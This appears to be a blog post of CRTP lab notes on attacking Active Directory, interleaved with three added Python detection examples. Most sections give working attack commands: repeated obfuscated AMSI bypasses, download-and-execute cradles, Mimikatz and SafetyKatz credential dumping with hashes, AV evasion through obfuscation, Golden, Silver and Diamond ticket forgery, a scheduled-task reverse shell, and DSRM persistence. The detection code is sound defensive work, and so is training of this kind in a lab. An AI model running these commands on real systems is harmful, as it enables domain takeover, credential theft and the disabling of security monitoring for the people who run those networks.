CRTP (Certified Red Team Professional)

HackingSkills
10 min read, Dec 24, 2023

{Session 2}

Admin Reconnaissance//:

It can be done with:

  • BloodHound
  • SharpHound

BloodHound is a GUI that shows the AD entities and the relationships between them from the collected data.

Download and set it up from https://github.com/BloodHoundAD/BloodHound

To run the collector we first need to bypass AMSI and script logging by running InviShell,

and then

. C:\AD\Tools\BloodHound-master\Collectors\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All

or

SharpHound.exe

To make BloodHound collection stealthier, use the -Stealth option.

Invoke-BloodHound -Stealth

or

SharpHound.exe --stealth

To avoid detections like MDI (Microsoft Defender for Identity), exclude the domain controllers from collection:

Invoke-BloodHound -ExcludeDCs

Lab manual Learning Object 6:-

Setup BloodHound:

To install and start neo4j:

Unzip the archive C:\AD\Tools\neo4j-community-4.1.1-windows.zip

neo4j.bat install-service

neo4j.bat start

Navigate to http://localhost:7474

Log in with the default username neo4j and password neo4j, then set a new password.

Open BloodHound:

C:\AD\Tools\BloodHound-win32-x64\BloodHound-win32-x64

Enter the following:

bolt://localhost:7687

Username: neo4j

Password: the new password you set for neo4j

To run the collector:

cd C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors

$ZQCUW = @” using System; using System.Runtime.InteropServices; public class ZQCUW { [DllImport(“kernel32”)] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport(“kernel32”)] public static extern IntPtr LoadLibrary(string name); [DllImport(“kernel32”)] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); } “@ Add-Type $ZQCUW $BBWHVWQ = [ZQCUW]::LoadLibrary(“$([SYstem.Net.wEBUtIlITy]::HTmldecoDE(‘amsi.dll’))”) $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ, “$([systeM.neT.webUtility]::HtMldECoDE(‘AmsiScanBuffer’))”) $p = 0 [ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p) $TLML = “0xB8” $PURX = “0x57” $YNWL = “0x00” $RTGX = “0x07” $XVON = “0x80” $WRUD = “0xC3” $KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD) [System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)

. .\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All -Verbose

End of Learning Object 6

Lateral Movement//:

It can be done with:

  • PowerShell remoting
  • Invoke-Mimikatz
  • DCSync

PowerShell remoting

PowerShell remoting works like PsExec but is faster and quieter.

PS remoting uses Windows Remote Management (WinRM), which listens on HTTP port 5985 and HTTPS port 5986.

PS remoting must be enabled on the target and we need admin privileges to use it.

When it works, we get a shell with administrative privileges on the target.

It can be used in two ways:

  • One-to-one, using the New-PSSession command: interactive and stateful, but it does not scale to multiple machines; it runs as a new process on the target.

$adminsrv = New-PSSession -ComputerName {computer name}

$adminsrv

  • One-to-many (fan-out remoting), using Invoke-Command: not interactive, but it works well against multiple machines and runs the commands in parallel.

We can use -Credential to pass a username and password.

Run commands:

Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content {list})

Run a script from a file:

Invoke-Command -FilePath {filepath} -ComputerName (Get-Content {list})

Run functions:

Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content {list})

Use -ArgumentList to pass arguments to the script block.

To bypass system-wide transcription and script block logging we use winrs:

winrs -r:server1 -u:username -p:password {command}
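As a defender-side companion to the collector notes above and to fan-out remoting, here is an added example (written for this page, not part of the original notes or of the BloodHound/PowerShell tooling) that looks for the network shape both leave behind: one source reaching many distinct hosts on SMB 445 (session and local-group collection) or on WinRM 5985/5986 (Invoke-Command against a list of computers) inside a short window. The connection records, host names and thresholds are constructed for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Monitored ports and what a burst of distinct destinations on each one usually is.
PORT_LABELS = {
    445: "SMB sweep: session/local-group collection (SharpHound-like)",
    5985: "WinRM fan-out remoting (Invoke-Command against many hosts)",
    5986: "WinRM fan-out remoting (Invoke-Command against many hosts)",
}

def parse(line):
    """Parse a constructed 'HH:MM:SS source destination port' record."""
    ts, src, dst, port = line.split()
    return datetime.strptime(ts, "%H:%M:%S"), src.lower(), dst.lower(), int(port)

def detect_fan_out(lines, threshold=5, window=timedelta(seconds=60)):
    """Return (source, port, distinct_hosts, label) for each source that reaches
    at least `threshold` distinct hosts on one monitored port inside `window`.
    One alert per (source, port); tune threshold and window per environment, since
    backup agents and vulnerability scanners produce the same shape."""
    by_key = defaultdict(list)
    for ts, src, dst, port in sorted(map(parse, lines)):
        if port in PORT_LABELS:
            by_key[(src, port)].append((ts, dst))
    alerts = []
    for (src, port), events in by_key.items():
        recent = deque()  # events inside the sliding window
        for ts, dst in events:
            recent.append((ts, dst))
            while ts - recent[0][0] > window:
                recent.popleft()
            distinct = {d for _, d in recent}
            if len(distinct) >= threshold:
                alerts.append((src, port, len(distinct), PORT_LABELS[port]))
                break
    return alerts

# Constructed sample records (not real logs): "time source destination port".
SAMPLE_CONNECTIONS = (
    # student01 touches six hosts on 445 within 25 s: a collector sweep
    [f"10:00:{i * 5:02d} student01 srv{i:02d} 445" for i in range(6)]
    # the same host then fans out over WinRM to five hosts within 16 s
    + [f"10:05:{i * 4:02d} student01 app{i:02d} 5985" for i in range(5)]
    # admin-ws opens two WinRM sessions ten minutes apart: routine administration
    + ["11:00:00 admin-ws app01 5985", "11:10:00 admin-ws app02 5985"]
    # filesrv talks to dc01 on 445 constantly, but to that one host only
    + [f"12:00:{i:02d} filesrv dc01 445" for i in range(10)]
)

if __name__ == "__main__":
    for src, port, count, label in detect_fan_out(SAMPLE_CONNECTIONS):
        print(f"{src}: {count} hosts on {port} -> {label}")
```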

Invoke-Mimikatz

Used to dump credentials and tickets.

Needs administrative privileges to run.

DCSync:

Extracts credentials from the DC without executing code on it.

AV bypassing:

  • DefenderCheck is used to identify code and strings in a binary that Windows Defender may flag.

DefenderCheck.exe <Path to Sharpkatz binary>

  • Compress the binary with Out-CompressedDll
  • and add the output to the original script; copy the byte size and paste it into Program.cs

Out-CompressedDll <Path to mimikatz.exe> > outputfilename.txt

  • Convert the file to base64

$filename = "script_path.zip"

[Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) | clip

Modify the Program.cs file:

  • Add a new variable that contains the base64 value of the mimikatz_trunk.zip file.
  • Comment out the code that downloads or accepts the mimikatz file as an argument.
  • Convert the base64 string to bytes and pass it to the zipStream variable.
  • Obfuscate the binary

We use ConfuserEx:

  • Launch ConfuserEx
  • In the Project tab, select the Base Directory where the binary file is located.
  • In the Project tab, select the binary file that we want to obfuscate.
  • In the Settings tab, add the rules.
  • In the Settings tab, edit the rule and select the preset `Normal`.
  • In the Protect tab, click the Protect button.
  • The new obfuscated binary is in the Confused folder under the Base Directory.

Lab manual Learning Object 7:-

Bypass Enhanced Script Block Logging:

iex (iwr http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing)

Bypass AMSI:

S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

Download and execute PowerView in memory in the reverse shell:

iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1'))

Identify a machine in the target domain where a Domain Admin session is available:

Find-DomainUserLocation

Abuse using winrs:

winrs -r:dcorp-mgmt hostname;whoami

Download Loader.exe on dcorp-ci and copy it from there to dcorp-mgmt:

iwr http://172.16.100.x/Loader.exe -OutFile C:\Users\Public\Loader.exe

Copy Loader.exe to dcorp-mgmt:

echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

Add the following port forward on dcorp-mgmt to avoid detection there:

$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x"

Use Loader.exe to download and execute SafetyKatz.exe in-memory on dcorp-mgmt:

$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

Abuse using PowerShell Remoting:

Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt

Host Invoke-Mimi.ps1 on your studentx machine:

iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing)

We must disable AMSI there:

$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

Invoke-Command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess

Invoke-Command -ScriptBlock ${function:Invoke-Mimi} -Session $sess

Use OverPass-the-Hash with svcadmin's credentials:

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Try accessing the domain controller from the new process:

winrs -r:dcorp-dc whoami

dcorp\svcadmin

Find the machines on which we have local admin privileges:

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

Find-PSRemotingLocalAdminAccess dcorp-adminsrv

Check if AppLocker is configured on dcorp-adminsrv by querying the registry keys:

winrs -r:dcorp-adminsrv cmd

reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2

reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2\Script\06dce67b-934c-454f-a263-2515c8796a5d

Confirm this using PowerShell commands on dcorp-adminsrv:

Enter-PSSession dcorp-adminsrv

$ExecutionContext.SessionState.LanguageMode

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Disable Windows Defender real-time monitoring on the dcorp-adminsrv server:

Set-MpPreference -DisableRealtimeMonitoring $true -Verbose

Modify Invoke-Mimi.ps1 to include the function call in the script itself and transfer the modified script (Invoke-MimiEx.ps1) to the target server:

Create a copy of Invoke-Mimi.ps1 and rename it to Invoke-MimiEx.ps1:

Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 '\\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\Program Files'

ls

Open Invoke-MimiEx.ps1 in PowerShell ISE (right click on it and click Edit)

Add the line Invoke-Mimi -Command '"sekurlsa::ekeys"' to the end of the file.

Run the modified script:

.\Invoke-MimiEx.ps1

OverPass-the-Hash for the srvadmin user using SafetyKatz:

C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit"

Check if srvadmin has admin privileges on any other machine:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

Find-PSRemotingLocalAdminAccess -Verbose

Extract credentials from the machine:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

winrs -r:dcorp-mgmt cmd

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

Take a session to dcorp-mgmt with PSRemoting:

Enter-PSSession -ComputerName dcorp-mgmt

whoami

Disable AMSI on the target server:

S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

Download and execute Invoke-Mimi:

iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing)

Invoke-Mimi -Command '"sekurlsa::ekeys"'

Use Invoke-Mimi to extract credentials from the credential vault:

Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"'

Use the svcadmin credentials on the student VM using OverPass-the-Hash:

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

End of Learning Object 7

Domain Admin Privilege//:

Kerberos is the authentication protocol in a Windows Active Directory domain.

Programs need to obtain tickets (credentials) from the KDC (Key Distribution Center), a service running on the domain controller.

Kerberos attacks (persistence):

  • Golden Ticket
  • Silver Ticket
  • Diamond Ticket
  • Skeleton Key
  • DSRM

Golden Ticket:

A TGT signed and encrypted with the hash of the krbtgt account.

Lab manual Learning Object 8:-

Extract secrets from the domain controller of dollarcorp:

Start a process with Domain Admin privileges:

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

copy Loader.exe on dcorp-dc and use it to extract credentials:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

winrs -r:dcorp-dc cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe

mimikatz # lsadump::lsa /patch

To get NTLM hash and AES keys of the krbtgt account:

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Create a Golden ticket:

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

klist

dir \\dcorp-dc\c$

Start a process with Domain Admin privileges:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Invoke-Mimi.ps1

Invoke-Mimi -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:cmd.exe"'

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

cd C:\AD\Tools

$sess = New-PSSession -ComputerName dcorp-dc

Enter-PSSession $sess

S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

exit

Invoke-Command -FilePath .\Invoke-Mimi.ps1 -Session $sess

Enter-PSSession $sess

Invoke-Mimi -Command '"lsadump::lsa /patch"'

Run the DCSync attack from the process running as DA:

Invoke-Mimi -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Create a Golden ticket:

Invoke-Mimi -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Try accessing the filesystem on the domain controller:

ls \\dcorp-dc\c$

Run WMI commands on the DC:

gwmi -Class win32_computersystem -ComputerName dcorp-dc

End of Learning Object 8

Silver Ticket:

A service ticket signed and encrypted with the hash of the service account.

Services rarely validate the PAC (Privilege Attribute Certificate), so the forged ticket is accepted.
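Both forged tickets leave a gap in the DC's own Kerberos audit trail, so here is an added example (written for this page, not taken from the CRTP material or from any tool it mentions) that correlates the three Security events involved: 4768 (TGT issued), 4769 (service ticket issued) and 4624 (logon on the target host). A Golden Ticket yields 4769s with no preceding 4768 for that account; a Silver Ticket yields a Kerberos 4624 on the target with no 4769 from any DC. The event dicts, names and times are constructed; the 10-hour window is the default domain ticket lifetime, which is also what the page's /endin:600 imitates.

```python
from datetime import datetime, timedelta

# Default domain policy: a Kerberos ticket is valid for at most 10 hours.
# The forged tickets on this page use /endin:600 (minutes) to look like that.
TICKET_LIFETIME = timedelta(hours=10)

def t(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M")

def host_of(service_name):
    """'DCORP-DC$' or 'HOST/dcorp-dc.dollarcorp.moneycorp.local' -> 'dcorp-dc'."""
    return service_name.split("/")[-1].rstrip("$").split(".")[0].lower()

def correlate_tickets(events, lifetime=TICKET_LIFETIME):
    """Return (time, kind, user, host) for ticket use with no matching issuance.
    events: dicts with id (4768/4769/4624), ts, user, plus service (4769) or
    host/auth/logon_type (4624). DC and member-server logs must be collected
    centrally with synchronised clocks; TGT renewals (4770) are not modelled
    and would need to be treated like 4768."""
    tgt_seen = {}  # user -> last TGT issued by a DC (4768)
    tgs_seen = {}  # (user, host) -> last service ticket issued for host (4769)
    findings = []
    for e in sorted(events, key=lambda e: e["ts"]):
        user = e["user"].lower()
        if e["id"] == 4768:
            tgt_seen[user] = e["ts"]
        elif e["id"] == 4769:
            host = host_of(e["service"])
            last = tgt_seen.get(user)
            if last is None or e["ts"] - last > lifetime:
                # TGS-REQ carrying a TGT the KDC never issued: Golden Ticket shape
                findings.append((e["ts"], "golden", user, host))
            tgs_seen[(user, host)] = e["ts"]
        elif e["id"] == 4624 and e.get("auth") == "Kerberos" and e.get("logon_type") == 3:
            host = e["host"].lower()
            last = tgs_seen.get((user, host))
            if last is None or e["ts"] - last > lifetime:
                # logon with a service ticket the KDC never issued: Silver Ticket shape
                findings.append((e["ts"], "silver", user, host))
    return findings

# Constructed sample events (not real log exports).
SAMPLE_EVENTS = [
    # Silver shape: Kerberos network logon on dcorp-dc, but no DC logged a 4769 for it
    {"id": 4624, "ts": t("2024-01-06 07:00"), "user": "Administrator", "host": "dcorp-dc",
     "auth": "Kerberos", "logon_type": 3},
    # Legitimate chain: svcadmin gets a TGT, then a service ticket for dcorp-dc, then logs on
    {"id": 4768, "ts": t("2024-01-06 08:00"), "user": "svcadmin"},
    {"id": 4769, "ts": t("2024-01-06 08:01"), "user": "svcadmin", "service": "DCORP-DC$"},
    {"id": 4624, "ts": t("2024-01-06 08:01"), "user": "svcadmin", "host": "dcorp-dc",
     "auth": "Kerberos", "logon_type": 3},
    # Golden shape: Administrator gets a service ticket although no TGT was issued in the last 10 h
    {"id": 4769, "ts": t("2024-01-06 09:00"), "user": "Administrator", "service": "DCORP-DC$"},
]
```

A legitimate ticket older than the window also trips the check, so keep the window equal to the domain's maximum ticket lifetime and treat hits as leads for a hunt, not as proof.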

Lab manual Learning Object 9:-

Get command execution on the domain controller by creating a Silver ticket:

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

OR

Invoke-Mimi -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Start a listener, then schedule and execute a task to run the reverse shell script:

  • Create a copy of Invoke-PowerShellTcp.ps1 and rename it to Invoke-PowerShellTcpEx.ps1.
  • Open Invoke-PowerShellTcpEx.ps1 in PowerShell ISE (right click on it and click Edit).
  • Add the line Power -Reverse -IPAddress 172.16.100.X -Port 443 to the end of the file.

schtasks /create /S dcorp-dc /SC Weekly /RU "NT Authority\SYSTEM" /TN "UserX" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/Invoke-PowerShellTcpEx.ps1''')'"

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "UserX"

On the listener:

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

hostname

whoami

For accessing WMI, we need to create two tickets: one for the HOST service and another for RPCSS. Run the commands below from an elevated shell:

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Inject a ticket for RPCSS:

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Check if the tickets are present:

klist

Try running WMI commands on the domain controller:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc

End of Learning Object 9

Diamond Ticket:

A valid TGT is decrypted, modified, and re-encrypted with the AES key of krbtgt.

It is safer (harder to detect) than a Golden Ticket because it starts from a legitimately issued TGT.

Lab manual Learning Object 10:-

Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack:

C:\AD\Tools\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Access the DC:

winrs -r:dcorp-dc cmd

whoami

End of Learning Object 10

Skeleton Key:

It patches the LSASS process on a domain controller so that access as any user is allowed with a single password.

DSRM:

DSRM is Directory Services Restore Mode.

There is a local administrator on every DC, called Administrator, whose password is the DSRM password.

The DSRM password is set when the server is promoted to a DC and is rarely changed.

After modifying the DC's logon behavior configuration, we can pass the NTLM hash of this account to access the DC.

Lab manual Learning Object 11:-

Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence:

Open a PowerShell remoting session:

$sess = New-PSSession dcorp-dc

Enter-PSSession -Session $sess

S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

Load the Invoke-Mimi script in the session:

Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess

Extract the credentials from the SAM on the DC:

Enter-PSSession -Session $sess

Invoke-Mimi -Command '"token::elevate" "lsadump::sam"'

Change the logon behavior for the account by modifying the registry on the DC:

New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Pass the hash for the DSRM administrator:

Invoke-Mimi -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

Access dcorp-dc directly from the new session:

ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
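Here is an added defender-side example (not part of the original notes) for the registry change this objective depends on: it rates the DsrmAdminLogonBehavior value the page sets to 2 and scans constructed Security 4657 (registry value modified) events for it, which only exist if a SACL on the Lsa key audits such writes. Event dicts and names are constructed; in the page's scenario the writing process would be wsmprovhost.exe, since the change is made over PowerShell remoting.

```python
LSA_KEY = r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
DSRM_VALUE = "DsrmAdminLogonBehavior"

# Documented meanings of the DWORD; anything other than 0 (or absent) widens DSRM logon.
BEHAVIOR = {
    0: ("ok", "DSRM Administrator can log on only while the DC is booted into DSRM"),
    1: ("warn", "DSRM Administrator can log on whenever the AD DS service is stopped"),
    2: ("alert", "DSRM Administrator can always log on, including over the network"),
}

def parse_dword(text):
    """4657 renders DWORDs as decimal or hex ('2', '0x2', '0x00000002')."""
    try:
        return int(text, 0)
    except ValueError:
        return int(text, 16)

def assess_dsrm_behavior(value):
    """Rate a DsrmAdminLogonBehavior value; None means absent, which behaves like 0."""
    if value is None:
        return BEHAVIOR[0]
    return BEHAVIOR.get(value, ("alert", f"undocumented value {value}"))

def scan_registry_events(events):
    """Return (severity, user, process, old, new, meaning) for every 4657 event
    that writes DsrmAdminLogonBehavior under the Lsa key. Needs a SACL on that
    key (Object Access > Audit Registry) or the DC never logs 4657 at all."""
    findings = []
    for e in events:
        if e.get("EventID") != 4657:
            continue
        if e.get("ObjectName", "").lower() != LSA_KEY.lower():
            continue
        if e.get("ObjectValueName", "").lower() != DSRM_VALUE.lower():
            continue
        old = parse_dword(e["OldValue"]) if e.get("OldValue") else None
        new = parse_dword(e["NewValue"]) if e.get("NewValue") else None
        severity, meaning = assess_dsrm_behavior(new)
        findings.append((severity, e.get("SubjectUserName"), e.get("ProcessName"), old, new, meaning))
    return findings

# Constructed 4657 records (not real log exports), flattened the way a SIEM would present them.
SAMPLE_EVENTS = [
    {"EventID": 4657, "ObjectName": LSA_KEY, "ObjectValueName": "LimitBlankPasswordUse",
     "OldValue": "1", "NewValue": "1", "SubjectUserName": "SYSTEM",
     "ProcessName": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 4657, "ObjectName": LSA_KEY, "ObjectValueName": DSRM_VALUE,
     "OldValue": "", "NewValue": "0x00000002", "SubjectUserName": "svcadmin",
     "ProcessName": r"C:\Windows\System32\wsmprovhost.exe"},  # written over PS remoting
    {"EventID": 4657, "ObjectName": LSA_KEY, "ObjectValueName": DSRM_VALUE,
     "OldValue": "2", "NewValue": "0", "SubjectUserName": "dcadmin",
     "ProcessName": r"C:\Windows\regedit.exe"},
]
```

The same assess_dsrm_behavior check can be run against a live export of the Lsa key from each DC as a periodic configuration audit, independent of whether 4657 auditing was enabled at the time of the change.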

End of Learning Object 11

End of Module 2

Created On 24th, December 2023

Edited on 6th, January 2024
